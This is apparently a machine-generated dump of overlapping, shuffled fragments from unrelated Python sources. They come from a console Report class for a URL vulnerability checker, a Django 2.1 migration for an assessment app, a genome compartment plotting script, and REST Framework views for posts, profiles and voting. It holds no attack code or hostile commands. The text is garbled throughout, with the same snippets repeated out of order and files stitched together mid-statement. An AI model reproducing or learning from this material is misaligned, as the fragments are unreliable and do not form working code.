:", "from lib.colour import colours class Report: def __init__(self, msg, result=False): \"\"\" Handles the", "it back to console :param msg : String type message :param result :", ": the boolean object indicating if the url is vulnerable \"\"\" if result:", "String type message :param result : the boolean object indicating if the url", "the boolean object indicating if the url is vulnerable \"\"\" if result: print(\"{}{}{}\".format(colours.FAIL,", "indicating if the url is vulnerable \"\"\" if result: print(\"{}{}{}\".format(colours.FAIL, msg, colours.ENDC)) else:", "Report: def __init__(self, msg, result=False): \"\"\" Handles the message and report it back", "report it back to console :param msg : String type message :param result", "result=False): \"\"\" Handles the message and report it back to console :param msg", "msg : String type message :param result : the boolean object indicating if", "__init__(self, msg, result=False): \"\"\" Handles the message and report it back to console", "import colours class Report: def __init__(self, msg, result=False): \"\"\" Handles the message and", "lib.colour import colours class Report: def __init__(self, msg, result=False): \"\"\" Handles the message", "object indicating if the url is vulnerable \"\"\" if result: print(\"{}{}{}\".format(colours.FAIL, msg, colours.ENDC))", ":param result : the boolean object indicating if the url is vulnerable \"\"\"", "console :param msg : String type message :param result : the boolean object", "Handles the message and report it back to console :param msg : String", "class Report: def __init__(self, msg, result=False): \"\"\" Handles the message and report it", "message and report it back to console :param msg : String type message", ":param msg : String type message :param result : the boolean object indicating", "type message :param result : the boolean object indicating if the url is", "msg, result=False): \"\"\" Handles the message and report it back to console :param" ]
[ "('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times',", "model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ),", "model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ),", "by Django 2.1.4 on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import", "Generated by Django 2.1.4 on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db", "model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ),", "model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment',", "migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}),", "25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019,", "name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField(", "django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'),", "default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at',", "model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019,", "name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField(", "), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', 
field=models.DecimalField(decimal_places=10, default=0.0,", "[ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history',", "datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score',", "name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField(", "dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ),", "'0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False),", "field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score',", "name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField(", "field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score',", "default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status',", "name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField(", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ]", "migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)),", "), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1,", "), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status', field=models.CharField(blank=True, default='started',", "migrations.AlterField( model_name='answer', name='created_at', 
field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)),", "max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status', field=models.CharField(blank=True,", "2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration):", "12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): dependencies", "models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField(", "), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1,", "migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [", "1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark',", "Django 2.1.4 on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations,", "migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at',", "migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19),", "field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score',", "# Generated by Django 2.1.4 on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from", "] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ),", "max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019,", "model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ),", "= [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField(", "), migrations.AlterField( 
model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1,", "2.1.4 on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models", "25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10,", "class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question',", "25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10,", "import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField(", "), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer',", "name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at',", "), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0,", "[ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment',", "1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at',", "migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19),", "name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1,", "migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)),", "field=models.BooleanField(default=False), ), 
migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)),", "migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField(", "model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ),", "model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status', field=models.CharField(blank=True, default='started', max_length=250), ),", "model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ),", "name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField(", "field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question',", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations =", "import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment',", "), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ),", "Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices',", "= [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score',", "field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question',", "name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status', field=models.CharField(blank=True, default='started', max_length=250), ), ]", "on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models class", "migrations.AlterField( model_name='score', 
name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status', field=models.CharField(blank=True, default='started', max_length=250),", "field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019," ]
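One caveat with the AddField above, noted here rather than changed in the migration itself: JSONField(default={}) hands the same mutable dict to every field instance, and later Django system checks flag this and ask for a callable. A safer spelling, were this migration edited by hand, would be:

        migrations.AddField(
            model_name='score',
            name='history',
            field=django.contrib.postgres.fields.jsonb.JSONField(default=dict),
        ),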
[ "structs)] all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords() for struct", "in paths] mats = [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)] all_comps", "<filename>scripts/plot_compartment_strength.py from matplotlib import pyplot as plt import sys sys.path.append(\"..\") import compartment_analysis as", "#all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes): plt.plot(gen_coords, comps,", "sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools as dt import os paths", "from matplotlib import pyplot as plt import sys sys.path.append(\"..\") import compartment_analysis as ca", "in paths] structs = [dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path, struct)", "path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords", "in mats] all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for", "os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths] structs =", "paths] structs = [dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path, struct) for", "for path in paths] mats = [dt.matFromBed(path, struct) for path, struct in zip(paths,", "all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps,", "= -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes): plt.plot(gen_coords, comps, label=prefix)", "for mat in mats] all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] =", "= sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path) for", "for path in paths] structs = [dt.structureFromBed(path) for path in paths] mats =", "plt import sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools as dt import", "import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths] structs", "mat in mats] all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1]", "-all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes): plt.plot(gen_coords, comps, label=prefix) plt.legend()", "for path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in mats]", "in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords()", "struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords =", "struct) for path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in", "[ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1]", "for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords,", "as plt import sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools as dt", "prefixes = [os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path) for path in", "structs = [dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path, 
struct) for path,", "compartment_analysis as ca import data_tools as dt import os paths = sys.argv[1:len(sys.argv)] prefixes", "mats = [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat)", "as dt import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in", "ca import data_tools as dt import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path)", "pyplot as plt import sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools as", "struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps,", "in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes):", "= [os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path) for path in paths]", "import pyplot as plt import sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools", "matplotlib import pyplot as plt import sys sys.path.append(\"..\") import compartment_analysis as ca import", "zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords() for", "sys.path.append(\"..\") import compartment_analysis as ca import data_tools as dt import os paths =", "as ca import data_tools as dt import os paths = sys.argv[1:len(sys.argv)] prefixes =", "paths] mats = [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)] all_comps =", "structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes): plt.plot(gen_coords,", "for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes): plt.plot(gen_coords, comps, label=prefix) plt.legend() plt.show()", "[os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path) for path in paths] mats", "import sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools as dt import os", "paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path)", "[dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path, struct) for path, struct in", "[dt.matFromBed(path, struct) for path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat", "= [dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path, struct) for path, struct", "[struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in", "path in paths] mats = [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)]", "= [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix", "= [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for", "path in paths] structs = [dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path,", "= [ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords() for struct in structs]", "import compartment_analysis as ca import data_tools as dt import os paths = sys.argv[1:len(sys.argv)]", "data_tools as dt import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path", "sys.argv[1:len(sys.argv)] prefixes = 
[os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path) for path", "import data_tools as dt import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for", "mats] all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords,", "all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords() for struct in", "dt import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths]" ]
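How the script is driven (the file names below are hypothetical; any number of BED-format inputs works, since everything is built from sys.argv[1:]):

# python plot_compartment_strength.py GM12878_chr21.bed K562_chr21.bed
# -> one compartment track per input, plotted against genomic coordinates
#    and labelled with the input's basename.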
[ "'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides", "self.get_object() if request.method == 'POST': # check if the vote already exists, if", "perform_create(self, serializer): \"\"\"Create a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'],", "or unvote on a post.\"\"\" post = self.get_object() if request.method == 'POST': #", "= Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return", "Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just return the post directly data", "\"\"\"API views for social_network.\"\"\" from rest_framework import viewsets from rest_framework.decorators import api_view, detail_route", "from rest_framework import viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response import Response", "get and list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class", "list of all Posts. create: Create a new Post as the logged-in user.", "all Posts. create: Create a new Post as the logged-in user. \"\"\" queryset", "directly data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save()", "again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just return the post", "documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request,", "or create Posts. retrieve: Return a post given its ID. list: Get a", "Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data", "}) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for Profiles.\"\"\" queryset =", "serializer): \"\"\"Create a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote')", "'POST': # check if the vote already exists, if so don't allow the", "PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a post given its ID. list:", "new Post as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer", "a post.\"\"\" post = self.get_object() if request.method == 'POST': # check if the", "Post as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def", "voted, just return the post directly data = PostSerializer(post, context={'request': self.request}).data return Response(data)", "= ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a post given", "Get a paginated list of all Posts. 
create: Create a new Post as", "and list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet):", "data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif", "paginated list of all Posts. create: Create a new Post as the logged-in", "serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote on a", "def vote(self, request, pk=None): \"\"\"Vote or unvote on a post.\"\"\" post = self.get_object()", "post = self.get_object() if request.method == 'POST': # check if the vote already", "PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method ==", "'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote on a post.\"\"\" post", "ID. list: Get a paginated list of all Posts. create: Create a new", "ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class", ".serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this is", "return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet):", "logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote", "Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts.", "DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class", "class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a post given its ID.", "user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote on", "rest_framework.decorators import api_view, detail_route from rest_framework.response import Response from rest_framework.reverse import reverse from", "a new Post as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class =", "new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data =", "generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format)", "exists, if so don't allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists():", "as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self,", "@api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this is useful for documentation generated", "a post given its ID. 
list: Get a paginated list of all Posts.", "post directly data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post)", "new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data = PostSerializer(post, context={'request': self.request}).data return", "create: Create a new Post as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created')", "import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this is useful", "reverse from .models import Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET'])", "already voted, just return the post directly data = PostSerializer(post, context={'request': self.request}).data return", "unvote on a post.\"\"\" post = self.get_object() if request.method == 'POST': # check", "\"\"\"Create a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def", "queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated", "if the vote already exists, if so don't allow the user to vote", "social_network.\"\"\" from rest_framework import viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response import", "post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data = PostSerializer(post, context={'request': self.request}).data", "reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get", "just return the post directly data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote", "this is useful for documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request,", "return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete()", "the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted,", 